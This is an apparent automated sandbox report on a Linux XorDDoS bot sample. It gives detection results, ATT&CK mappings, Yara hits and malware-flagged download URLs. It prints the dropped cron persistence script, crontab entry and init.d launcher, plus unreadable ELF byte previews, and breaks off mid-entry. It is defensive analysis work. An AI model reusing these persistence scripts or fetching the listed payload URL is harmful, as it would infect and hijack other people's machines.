Source: Yara match	File source: /usr/bin/mbeioyodii, type: DROPPED
Source: Yara match	File source: /usr/bin/drdxrfohux, type: DROPPED
Source: Yara match	File source: /usr/bin/doxgrgkpoa, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Scripting	1 Systemd Service	1 Systemd Service	12 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 At (Linux)	2 At (Linux)	2 At (Linux)	2 Scripting	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Malware Configuration

Threatname: XorDDoS

{"C2 list": []}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dptxrnhxmx.elf	79%	ReversingLabs	Linux.Network.XorDDoS
dptxrnhxmx.elf	74%	Virustotal		Browse
dptxrnhxmx.elf	100%	Avira	LINUX/Xorddos.cona
dptxrnhxmx.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/bin/doxgrgkpoa	100%	Avira	LINUX/Xorddos.cona
/usr/bin/tqdlzqtrvv	100%	Avira	LINUX/Xorddos.cona
/usr/bin/gcfolkfaec	100%	Avira	LINUX/Xorddos.cona
/usr/bin/mntlutgnfs	100%	Avira	LINUX/Xorddos.cona
/usr/lib/libudev.so	100%	Avira	LINUX/Xorddos.cona
/usr/bin/rhlqbltizb	100%	Avira	LINUX/Xorddos.cona
/usr/bin/tgdthymawi	100%	Avira	LINUX/Xorddos.cona
/usr/bin/drdxrfohux	100%	Avira	LINUX/Xorddos.cona
/usr/bin/zfzhrlhjxr	100%	Avira	LINUX/Xorddos.cona
/usr/bin/scllcnzpeu	100%	Avira	LINUX/Xorddos.cona
/usr/bin/wobaryykiz	100%	Avira	LINUX/Xorddos.cona
/usr/bin/mbeioyodii	100%	Avira	LINUX/Xorddos.cona
/usr/bin/qabtuykfdb	100%	Avira	LINUX/Xorddos.cona
/usr/bin/wrvptdarnp	100%	Avira	LINUX/Xorddos.cona
/usr/bin/doxgrgkpoa	100%	Joe Sandbox ML
/usr/bin/tqdlzqtrvv	100%	Joe Sandbox ML
/usr/bin/gcfolkfaec	100%	Joe Sandbox ML
/usr/bin/mntlutgnfs	100%	Joe Sandbox ML
/usr/lib/libudev.so	100%	Joe Sandbox ML
/usr/bin/rhlqbltizb	100%	Joe Sandbox ML
/usr/bin/tgdthymawi	100%	Joe Sandbox ML
/usr/bin/drdxrfohux	100%	Joe Sandbox ML
/usr/bin/zfzhrlhjxr	100%	Joe Sandbox ML
/usr/bin/scllcnzpeu	100%	Joe Sandbox ML
/usr/bin/wobaryykiz	100%	Joe Sandbox ML
/usr/bin/mbeioyodii	100%	Joe Sandbox ML
/usr/bin/qabtuykfdb	100%	Joe Sandbox ML
/usr/bin/wrvptdarnp	100%	Joe Sandbox ML
/etc/cron.hourly/gcc.sh	28%	ReversingLabs	Linux.Trojan.XorDDoS
/etc/cron.hourly/gcc.sh	41%	Virustotal		Browse
/usr/bin/tqdlzqtrvv	80%	ReversingLabs	Linux.Network.XorDDoS
/usr/bin/tqdlzqtrvv	66%	Virustotal		Browse
/usr/lib/libudev.so	79%	ReversingLabs	Linux.Network.XorDDoS
/usr/lib/libudev.so	74%	Virustotal		Browse

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qa	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gc	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wo	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wr	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9sc	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tg	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9rh	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar	16%	Virustotal		Browse
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9mb	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wo	dptxrnhxmx.elf, 6337.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6340.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6343.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6346.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6348.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www.gnu.org/software/libc/bugs.html	dptxrnhxmx.elf, doxgrgkpoa.11.dr, tqdlzqtrvv.11.dr, gcfolkfaec.11.dr, mntlutgnfs.11.dr, libudev.so.11.dr, rhlqbltizb.11.dr, tgdthymawi.11.dr, drdxrfohux.11.dr, zfzhrlhjxr.11.dr, scllcnzpeu.11.dr, wobaryykiz.11.dr, mbeioyodii.11.dr, qabtuykfdb.11.dr, wrvptdarnp.11.dr	false		high
http://www1.gggatat456.com/dd.rar	dptxrnhxmx.elf, 6208.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6210.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6211.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6212.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6243.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6246.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6248.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6251.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6254.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6298.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6301.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6304.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6307.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6309.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6316.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6319.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6322.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6325.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6327.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6337.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6340.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gc	dptxrnhxmx.elf, 6371.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6374.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6377.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6380.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6383.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wr	dptxrnhxmx.elf, 6298.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6301.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6304.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6307.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6309.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qa	dptxrnhxmx.elf, 6243.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6246.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6248.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6251.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6254.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9sc	dptxrnhxmx.elf, 6388.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6391.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6394.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6397.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6400.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tg	dptxrnhxmx.elf, 6406.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6409.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6414.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9rh	dptxrnhxmx.elf, 6354.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6357.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6359.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6362.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6365.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t	dptxrnhxmx.elf, 6208.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6210.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6211.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6212.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	false	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9mb	dptxrnhxmx.elf, 6316.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6319.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6322.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6325.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6327.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

⊘No contacted IP infos

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/cron.hourly/gcc.sh	1.elf	Get hash	malicious	XorDDoS	Browse
	iJl2Sb6qRa	Get hash	malicious	XorDDoS	Browse
	Di1p3oLnDb.elf	Get hash	malicious	XorDDoS	Browse
	fuck.elf	Get hash	malicious	XorDDoS	Browse
	dkuidbsedp	Get hash	malicious	XorDDoS	Browse
	libudev.so	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse
	xor1.o	Get hash	malicious	XorDDoS	Browse
	CCCxor.o	Get hash	malicious	XorDDoS	Browse
	2BAFxor.o	Get hash	malicious	XorDDoS	Browse
	task2.bin	Get hash	malicious	XorDDoS	Browse
	task2.bin	Get hash	malicious	XorDDoS	Browse
	task2.bin	Get hash	malicious	XorDDoS	Browse
	0Xorddos.o	Get hash	malicious	XorDDoS	Browse
	x.o	Get hash	malicious	XorDDoS	Browse
	23	Get hash	malicious	XorDDoS	Browse
	23	Get hash	malicious	XorDDoS	Browse
	XZFWLZVF1Z	Get hash	malicious	XorDDoS	Browse
	EgrT0zBhDa	Get hash	malicious	XorDDoS	Browse

Created / dropped Files

/etc/cron.hourly/gcc.sh

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.807897441464882
Encrypted:	false
SSDEEP:	3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
MD5:	3BAB747CEDC5F0EBE86AAA7F982470CD
SHA1:	3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
SHA-256:	74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
SHA-512:	21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 28% Antivirus: Virustotal, Detection: 41%, Browse
Joe Sandbox View:	Filename: 1.elf, Detection: malicious, Browse Filename: iJl2Sb6qRa, Detection: malicious, Browse Filename: Di1p3oLnDb.elf, Detection: malicious, Browse Filename: fuck.elf, Detection: malicious, Browse Filename: dkuidbsedp, Detection: malicious, Browse Filename: libudev.so, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: xor1.o, Detection: malicious, Browse Filename: CCCxor.o, Detection: malicious, Browse Filename: 2BAFxor.o, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: 0Xorddos.o, Detection: malicious, Browse Filename: x.o, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: XZFWLZVF1Z, Detection: malicious, Browse Filename: EgrT0zBhDa, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.

/etc/crontab

Download File

Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.8484226636198593
Encrypted:	false
SSDEEP:	3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
MD5:	636299E19F3BFB8CDA661BC956C1CE7F
SHA1:	2B45273CCBFE139D58FC3554D6943D4338C18E15
SHA-256:	8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
SHA-512:	41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/3 * * * root /etc/cron.hourly/gcc.sh.

/etc/init.d/dptxrnhxmx.elf

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.223530700064981
Encrypted:	false
SSDEEP:	6:hUtoFdU9sd7LsKheJ+VUd7jBE21YJvmNeMwhqTUd711DzRIEpUdRa6Mz3pUdRq4:6iB60UBjBEMO1qQBXzuaUez5U5
MD5:	FE7661A66219E9FBF8EBAE2EA9474338
SHA1:	9012B20FD1A2896007A185BD4C2279E8F27BA5DD
SHA-256:	FF0AE208D55E859D7B8E0F6EBB2BEDC580DC6BBE67D94A9B8FA9A812BF38A245
SHA-512:	F6AECAEC980EBCE610BF96991BC9619CB2D98EA077B57CEF3AAD0399B1B56DAF189E6BEAFF85B154FEF0870AB726BA752B70E3EF0C07D8C6D2441C980FDBC1C5
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# chkconfig: 12345 90 90.# description: dptxrnhxmx.elf.### BEGIN INIT INFO.# Provides:..dptxrnhxmx.elf.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.dptxrnhxmx.elf.### END INIT INFO.case $1 in.start)../tmp/dptxrnhxmx.elf..;;.stop)..;;.*)../tmp/dptxrnhxmx.elf..;;.esac.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/gcc.pid

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	3.890319531114783
Encrypted:	false
SSDEEP:	3:hPnThWLHcDA1x:d1WLHc01x
MD5:	7F864F68A440A11433438A4A96D4A7D9
SHA1:	429DDA3489B6A7EC1E795DFEA42D60285B7CFA9F
SHA-256:	CD84323C978ADF1D75365F4D4FEAD57610A2BB16DDA3322CD46A891744D49627
SHA-512:	1E83C4397C023C8278A2C443CFD759C29CA7EEF4B4A072E8B6F736164A29B2094C70D8CBAA8C3799EAAF68DEF2BBBDFD68BD900D8631EEE6467F67B7A8A6DD11
Malicious:	false
Reputation:	low
Preview:	myqtggqhibmhvmkvmysnhuayfhwdfvnt

/usr/bin/doxgrgkpoa

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625900
Entropy (8bit):	6.244458977151379
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1A1:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91M
MD5:	554E86FE72F87DDBDC34820E327D739C
SHA1:	DF92E1019250E80CC72874D636262A26EAA32B6C
SHA-256:	2E4EDC430EC49D866030C1BD74B30398982841B319269DDE17C88C57FE0196B8
SHA-512:	537B78D38E2576F44F3832725F5015D3B3C34EE8793033F9558B855ED463853B74210B0FC402ADBC9A9321BEB57A3E99670CA2EB9CA7551124B44A9ED04E0202
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/doxgrgkpoa, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/doxgrgkpoa, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/doxgrgkpoa, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/doxgrgkpoa, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/doxgrgkpoa, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/doxgrgkpoa, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/doxgrgkpoa, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/doxgrgkpoa, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/drdxrfohux

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625900
Entropy (8bit):	6.2444426828370165
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ad:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/918
MD5:	FAE507CACB8EF11ECE2641D2443B133C
SHA1:	3FE5C7244934A010010C3499EC58E5CD4A10FA3F
SHA-256:	18CCE43E68CEC80AEA3743C16184225D99DD28AC51C143AC81F7585ED01637F9
SHA-512:	04529DAC085867F0BE3C343EF24642C6D8B6143DFFDF84269EE28E63BF2DC450B9DA1FD78AD029AB5E0B3CF6271484053144070845F0696C6BA6C8331DF3E589
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/drdxrfohux, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/drdxrfohux, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/drdxrfohux, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/drdxrfohux, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/drdxrfohux, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/drdxrfohux, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/drdxrfohux, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/drdxrfohux, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/gcfolkfaec

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244419621475789
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ak:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91j
MD5:	0F3620128A01D72DEAD621566854B259
SHA1:	F40A356E5B1B506D5144F2D9987B96377423D06A
SHA-256:	7C3F872432B223B19CA776D3815DFF49DB541CBF896AA6001D3AAA8AA6B40F8C
SHA-512:	4575AFE93433C0F94C69C6BEE6B6B109DA266BF037B4D1A1F7A80BA25B092A392CD58F9C902D63FE8BF22B76A088BBE8361DD346B83A9D3AE0092DA434D34829
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/gcfolkfaec, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/gcfolkfaec, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/gcfolkfaec, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/gcfolkfaec, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/gcfolkfaec, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/gcfolkfaec, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/gcfolkfaec, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/gcfolkfaec, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/mbeioyodii

Download File

Process:	/tmp/dptxrnhxmx.elf
